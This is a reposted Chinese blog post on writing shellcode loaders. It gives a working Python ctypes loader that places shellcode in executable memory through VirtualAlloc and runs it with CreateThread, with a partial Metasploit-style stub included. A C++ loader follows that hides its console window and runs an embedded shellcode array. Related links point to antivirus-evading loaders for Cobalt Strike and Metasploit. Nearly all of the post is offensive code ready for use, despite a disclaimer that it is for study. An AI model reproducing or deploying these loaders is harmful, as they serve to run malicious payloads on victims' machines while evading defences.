shellcode加载器编写

本文转载自查看原文 2020-11-25 09:57 685 Penetration test

Python3 shellcode通用加载器

#!/usr/bin/python3
import ctypes

#shellcode 放这个位置
c = b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31"

shellcode = bytearray(c)

ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))
 
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                     buf,
                                     ctypes.c_int(len(shellcode)))

ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_int(ptr),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))
 
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

c++加载器

#include <Windows.h>
#include <stdio.h>
using namespace std;
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
#pragma comment(linker, "/INCREMENTAL:NO")

int main(int argc, char** argv) {
    unsigned char ShellCode[] = "";

    void* exec = VirtualAlloc(0, sizeof ShellCode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, ShellCode, sizeof ShellCode);
    ((void(*)())exec)();
    return 0;
}

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 通用Shellcode加载器理解go语言的shellcode加载器 Linux下shellcode的编写编写shellcode的几种姿势通用ShellCode的编写与调用 shellcode的编写学习 [原创]Python免杀ShellCode加载器(Cobaltstrike/Metasploit) Python内存加载shellcode 编写并提取通用 ShellCode Windows下ShellCode编写初步